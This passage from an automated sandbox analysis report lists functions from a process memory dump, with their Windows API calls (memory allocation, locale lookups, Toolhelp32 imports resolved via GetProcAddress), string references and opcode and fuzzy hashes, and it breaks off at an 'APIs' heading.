Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction ID: a3adf5a57ee28e6e2dab2f755e44b3ebff12ec3653b0bf3b873defc3a9b41af1
Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
Instruction Fuzzy Hash: 7BC012B26002305BEF215699ACC075262CCDB05298F1440A1B404D7355E360DC00C6B0

Function 02DBC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02DBC350,00000000,00000001), ref: 02DBC36C

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: f26aabbbe9244d642141f1e01ecf7c61e20eba1f26f3288ae5c4e6333a889ee3
Instruction ID: 2e9d2187351c79f4141dbf6fe335b87d67cace6e8196084dfec716d2b463c1cc
Opcode Fuzzy Hash: f26aabbbe9244d642141f1e01ecf7c61e20eba1f26f3288ae5c4e6333a889ee3
Instruction Fuzzy Hash: 9DC048F17A03006AFA1196A99CD2F66669DE709B51F540412BA05AA3D1D2A26C114E68

Function 02D94C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D94C3F

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction ID: 2b40b518b8e32ae2d61e8a9a2e62f842e7ef0957f8938ab92b75cef3b8c4bc6c
Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
Instruction Fuzzy Hash: C6B0923420820229EF1826A20E11736004C4B4128AF840051BE58C82D2EA00CC02C875

Function 02D94C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02D94C57

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction ID: bc07f8b6eedefe87930551b36a0e7b9b7e05d14c10244d987971a123a1a117d3
Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
Instruction Fuzzy Hash: B3A011B80082030A8F0A32A8002002A2222AEC0280B88C0A822000A20A8A2A8802E830

Function 02D915CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D91A03,?,02D92000), ref: 02D915E2

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2fbd97f54d9fa735bcbb7f6e18a403181ef2d06a850e37102de4812fcfbd6323
Instruction ID: 2d115b918062f4f470cd242a0961419ee81688f6869fa46376182c295e56050d
Opcode Fuzzy Hash: 2fbd97f54d9fa735bcbb7f6e18a403181ef2d06a850e37102de4812fcfbd6323
Instruction Fuzzy Hash: 11F049F0B813004FDB0ADFBA99417057AE2EB8A344F508579E609DB3C8E77188428B10

Function 02D91682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D92000), ref: 02D916A4

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0dface921df768471dc1bc8214818c4f73879463149f5b74b9219ce49e401b68
Instruction ID: bc59c34e7550b573dc38f042df7893b628267e188726136d7cecf17a6a8f73fc
Opcode Fuzzy Hash: 0dface921df768471dc1bc8214818c4f73879463149f5b74b9219ce49e401b68
Instruction Fuzzy Hash: 48F090B2A806956BDB119E5A9C80782BB98FB00314F454139F90897340D770AC50CB94

Function 02D916E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02D91704

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 725fcef0cedc5fc13c90a8f6d85cd0ba0952b8291f37868107b0fb157ea5bd46
Instruction ID: 6ee48f133f00fc779a8da34df6fa5d48e96701894b1d6b4e695ab23f9186088c
Opcode Fuzzy Hash: 725fcef0cedc5fc13c90a8f6d85cd0ba0952b8291f37868107b0fb157ea5bd46
Instruction Fuzzy Hash: 1EE08C76340313AFEF105E7A5D80B12ABDCEB49664F284476F649DB381D2A0EC108B70

Non-executed Functions

Function 02DAAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DAADA3,?,?,02DAAE35,00000000,02DAAF11), ref: 02DAAB30
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DAAB48
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DAAB5A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DAAB6C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DAAB7E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DAAB90
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DAABA2
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DAABB4
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DAABC6
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DAABD8
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DAABEA
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DAABFC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DAAC0E
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DAAC20
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DAAC32
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DAAC44
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DAAC56

Strings

Process32First, xrefs: 02DAABAC
Thread32First, xrefs: 02DAABF4
Toolhelp32ReadProcessMemory, xrefs: 02DAAB9A
Heap32ListFirst, xrefs: 02DAAB52
Heap32First, xrefs: 02DAAB76
Module32NextW, xrefs: 02DAAC4E
Process32NextW, xrefs: 02DAABE2
Module32First, xrefs: 02DAAC18
CreateToolhelp32Snapshot, xrefs: 02DAAB40
kernel32.dll, xrefs: 02DAAB2B
Heap32Next, xrefs: 02DAAB88
Process32Next, xrefs: 02DAABBE
Process32FirstW, xrefs: 02DAABD0
Module32Next, xrefs: 02DAAC2A
Thread32Next, xrefs: 02DAAC06
Heap32ListNext, xrefs: 02DAAB64
Module32FirstW, xrefs: 02DAAC3C

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 16e85ae806147cb032cb46a4bde57bc1f092d847706e967c57b037fa9f11fa3e
Instruction ID: b6eaaedbc40cf437531e44461e34e880755682ce423dd26327cb733a3957eed9
Opcode Fuzzy Hash: 16e85ae806147cb032cb46a4bde57bc1f092d847706e967c57b037fa9f11fa3e
Instruction Fuzzy Hash: BE317CB5A806909FFF10EFA5E895E2977B9EB15701B400AA5B801DF304E774EC94CF61

Function 02D95908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D9593C
lstrcpynA.KERNEL32(?,?,?), ref: 02D9596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D959D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000), ref: 02D95A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C), ref: 02D95A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D95A99

Strings

\, xrefs: 02D95A49
kernel32.dll, xrefs: 02D95920
GetLongPathNameA, xrefs: 02D95933

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 1801d23f05834e5e86922f6f8f6037bcd16c09f42b24ab3c6aaa5f32d9fd54a3
Instruction ID: d70846763796a3aed3edd41c459bca0bbe84ef737484a25debeb388db899a08a
Opcode Fuzzy Hash: 1801d23f05834e5e86922f6f8f6037bcd16c09f42b24ab3c6aaa5f32d9fd54a3
Instruction Fuzzy Hash: DF414971D0421AAFDF11EAA8DC88A9EB3BDEB09350F5445A5B148E7341E730EE44CF64

Function 02D95BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D95BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D95BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D95BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D95C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D95CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D95CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02D95B38
Software\Borland\Locales, xrefs: 02D95AFC, 02D95B1A

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 5aa5487cedbdba7a185217707cd9fca82b0e2d5471336f4b86dc124b6860293f
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 15317571E4026D2AEF26D6B49C46FDE77AD9B04380F8441B1BA48E6281D674DE84CF60

Function 02D97FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D97FF5

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction ID: fd8526501ee46944da8aa0f8d2cab771e5ea21b8732d24fcbcc19c1f5da71dc8
Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction Fuzzy Hash: A411BEB5A00209AF9B04CF99C8819AFF7F9EFC8300F54C569A509E7254E6719E018BA0

Function 02D9A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 26bf9909e9f9f435f08386689ceea02c509e2bcdac98b531653df466ef0e98c4
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: ECE0D87270022417DB11A5989C81EFA735DDB58310F0042BABE05C7385EDE1DE804BF4

Function 02D9B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02DBD106,00000000,02DBD11E), ref: 02D9B79A

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 9913a7d43f97173169acd96ede9a5d8bc25c18fda94eb8ea0d31b8309e8a442f
Instruction ID: d411b850f0d3eb05ac1f7ac4a57c5bf8d858c3cf17d1bafbff86062d0a83a5c3
Opcode Fuzzy Hash: 9913a7d43f97173169acd96ede9a5d8bc25c18fda94eb8ea0d31b8309e8a442f
Instruction Fuzzy Hash: 09F0F474904301EFD741DF28E45065577E9FB48704F808E29F69987B80EB399C14DBA2

Function 02D9A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02D9BE72,00000000,02D9C08B,?,?,00000000,00000000), ref: 02D9A823

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: bd160b2deee9102eb4f7c3ed40b6b75a0d4c75a6470d6c112cbf7f14a9bd6e75
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 0AD05EB330E2A02AAB10925A2D84D7B5AECCAC57A1F00407ABA88C6301D600CC07DBB1

Function 02D9920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02D99210

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 6792351bb08f269a0e44a9d8acb7a83e3f0ec02b8e1c2bf8f785eacc16048be1
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: 25A01250404860418A4033180C0253430449810A20FC4878078F8403D0E91D452081E3

Function 02D9C977 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfb175fb32393fe8673b248012d6a464aeaca16444a5f0bf0953634ee1108b5
Instruction ID: e8e6bdc578135efa98f2885282c841d0f9388acd101bdd8f76f4552d47466f2a
Opcode Fuzzy Hash: 6bfb175fb32393fe8673b248012d6a464aeaca16444a5f0bf0953634ee1108b5
Instruction Fuzzy Hash: 19D1787192E3CA8FDB135B3488352857F319E9B30475A45D3F0858F7A7E6284D1ACBA2

Function 02D920C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02D9D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

